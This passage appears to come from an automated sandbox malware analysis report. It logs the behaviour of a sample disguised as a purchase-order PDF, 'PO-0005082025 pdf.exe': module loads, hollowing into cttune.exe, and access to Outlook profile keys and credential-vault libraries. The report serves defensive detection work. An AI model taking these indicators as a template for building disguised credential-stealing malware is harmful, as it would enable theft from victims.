Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cttune.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\kFyMObCKLtmWszxRMHRYPPOiaZktXMkLUYfPDwyfFqAJbyWbjJlgT\VuOkdnWJwVVuK.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\cttune.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO-0005082025 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO-0005082025 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cttune.pdb source: PO-0005082025 pdf.exe, 00000006.00000002.2292077264.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000003.2270066946.0000000000EEB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: cttune.pdbGCTL source: PO-0005082025 pdf.exe, 00000006.00000002.2292077264.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, VuOkdnWJwVVuK.exe, 0000000A.00000003.2270066946.0000000000EEB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VuOkdnWJwVVuK.exe, 0000000A.00000000.2206402486.0000000000D4E000.00000002.00000001.01000000.0000000C.sdmp, VuOkdnWJwVVuK.exe, 0000000C.00000002.2978690059.0000000000D4E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO-0005082025 pdf.exe, 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2291880724.0000000004ECC000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2293700090.0000000005079000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-0005082025 pdf.exe, PO-0005082025 pdf.exe, 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000B.00000002.2979051418.0000000005220000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000002.2979051418.00000000053BE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2291880724.0000000004ECC000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000B.00000003.2293700090.0000000005079000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_0581303C push eax; ret	0_2_0581303D
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 0_2_079863A9 push 7407975Eh; ret	0_2_079863B5
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_004178CA push edx; iretd	6_2_004178CD
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_004150EB push esp; iretd	6_2_0041514F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040D8B6 push ecx; ret	6_2_0040D8B7
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00415119 push esp; iretd	6_2_0041514F
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00424A53 push 3D550B4Fh; ret	6_2_00424A6B
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00417A3B push ebx; iretd	6_2_00417A3C
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_00423D13 push edi; retf	6_2_00423D1E
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_0040AEDA push FFFFFF84h; retf	6_2_0040AEDC
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_004036A0 push eax; ret	6_2_004036A2
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Code function: 6_2_019409AD push ecx; mov dword ptr [esp], ecx	6_2_019409B6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_052509AD push ecx; mov dword ptr [esp], ecx	11_2_052509B6
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03244398 push ebx; iretd	11_2_03244399
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03244227 push edx; iretd	11_2_0324422A
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0325071B push esp; iretd	11_2_03250741
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03250670 push edi; retf	11_2_0325067B
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03250CBD push edi; ret	11_2_03250CBE
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_032513B0 push 3D550B4Fh; ret	11_2_032513C8
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03241A76 push esp; iretd	11_2_03241AAC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03241A48 push esp; iretd	11_2_03241AAC
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_03237837 push FFFFFF84h; retf	11_2_03237839
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510617B push cs; retf	11_2_05106182
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_05105064 push cs; retf	11_2_05105065
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_051073E2 push edx; ret	11_2_051073E3
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510FD1D push es; iretd	11_2_0510FD1E
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510EF9C push cs; retf	11_2_0510EF9D
Source: C:\Windows\SysWOW64\cttune.exe	Code function: 11_2_0510F8C8 push ebx; iretd	11_2_0510F902

Source: PO-0005082025 pdf.exe

Static PE information: section name: .text entropy: 7.759806370210631

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0005082025 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
